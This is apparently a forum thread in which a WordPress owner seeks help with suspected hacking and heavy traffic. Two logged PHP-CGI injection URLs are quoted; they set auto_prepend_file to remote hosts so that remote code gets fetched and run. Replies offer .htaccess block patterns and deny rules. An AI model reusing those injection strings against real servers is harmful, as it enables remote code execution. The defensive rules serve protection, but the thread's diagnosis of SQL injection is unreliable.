Invisible Hack

I just checked the original files and the ‘archipelago’ link was there to begin with.

I see in the stats some stuff like this appending to an index.php file access:

/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttps://61.19.253.26/echo.txt

/index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=https://75.99.7.131/changlog.txt

I see the admin-ajax.php file was also accessed… am I getting closer?

THE PROBLEM IS, I MUST determine if this is in the back end files or the DB itself before I move the site. If in the back end, no worries, a new install will take care of that. But if in the DB, I would simply be reintroducing it on the new host.

Please upgrade wordpress to latest version.

Looks like somebody is trying to gain access through sql injection procedure.

Please intimate your web hosting provider as well.

They already have. The question is, is it in the theme files, the back end files, or the DB?

If the first two, no matter as I will be installing fresh on a new server.

It is the DB I am concerned about.

The redirects are going on right now, because even as I type the hits are racking up, 12,000 today alone. But every place I look I cannot seem to pinpoint what is doing the redirections.

I have examined .htcacess files, back end files, plugins, blog posts, everything.

The attacks can be external as well as internal. If they are external you can always edit your htaccess file as follows:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC]
RewriteRule ^(.*)$ - [F,L]
RewriteCond %{QUERY_STRING} \.\.\/ [NC,OR]
RewriteCond %{QUERY_STRING} boot\.ini [NC,OR]
RewriteCond %{QUERY_STRING} tag\= [NC,OR]
RewriteCond %{QUERY_STRING} ftp\:  [NC,OR]
RewriteCond %{QUERY_STRING} http\:  [NC,OR]
RewriteCond %{QUERY_STRING} https\:  [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [NC,OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>|ê|"|;|\?|\*|=$).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*("|'|<|>|\|{||).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%24&x).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare).* [NC]
RewriteCond %{HTTP_COOKIE} !^.*wordpress_logged_in_.*$
RewriteRule ^(.*)$ - [F,L]
</IfModule>

Prevent access to sensitive files – htaccess

Options All -Indexes
<files .htaccess>
Order allow,deny
Deny from all
</files>
<files readme.html>
Order allow,deny
Deny from all
</files>
<files license.txt>
Order allow,deny
Deny from all
</files>
<files install.php>
Order allow,deny
Deny from all
</files>
<files wp-config.php>
Order allow,deny
Deny from all
</files>
<files error_log>
Order allow,deny
Deny from all
</files>
<files fantastico_fileslist.txt>
Order allow,deny
Deny from all
</files>
<files fantversion.php>
Order allow,deny
Deny from all
</files>

A tool like Mole, sqlmap etc can be configured to automate sqlinjection using proxies, so it can be external attack without compromising any internal files.

If its an internal attack, and you are worried with protection of database, perform a clean installtion of wordpress and import/export content using wordpress tool. Create a new database with unique table name and integrate it with installation of wordpress.

We can then determine if the attack is internal or external. Your Hosting provider can always determine if you are attracting the traffic or there is external traffic bound to your way.

Thank you for your efforts but I do not understand a word of this.

All I know is, since the site was turned back on today, it has 12,000 hits so I did not block every single IP that I could have.

In the space of 15 days it had well over a MILLION hits. This is not normal…

I’m shocked at how many people post that their bandwidth was exceeded and yet, no one offers them the possibility they are being used to spam or have been hacked.

I knew that 1.5M hits on my site in 15 days was not normal, but we having a terrible time finding the hack. I’ve looked through every file.

Now what?

If your site gets 1,000 hits per day and suddenly it is getting 12,000 hits as mine did today, there has to be something wrong.

I have gone through every back end and theme file and the DB and nothing is amiss. But I am still getting massive hits, all from noted spammers IPs, thousands. I have blocked the countries, but still today had 9,000+ hits on a site that is only supposed to have 1,000 per day or so.

How does one block who or what is doing this completely?

I would say it’s not spam but a DOS attack on my site alone.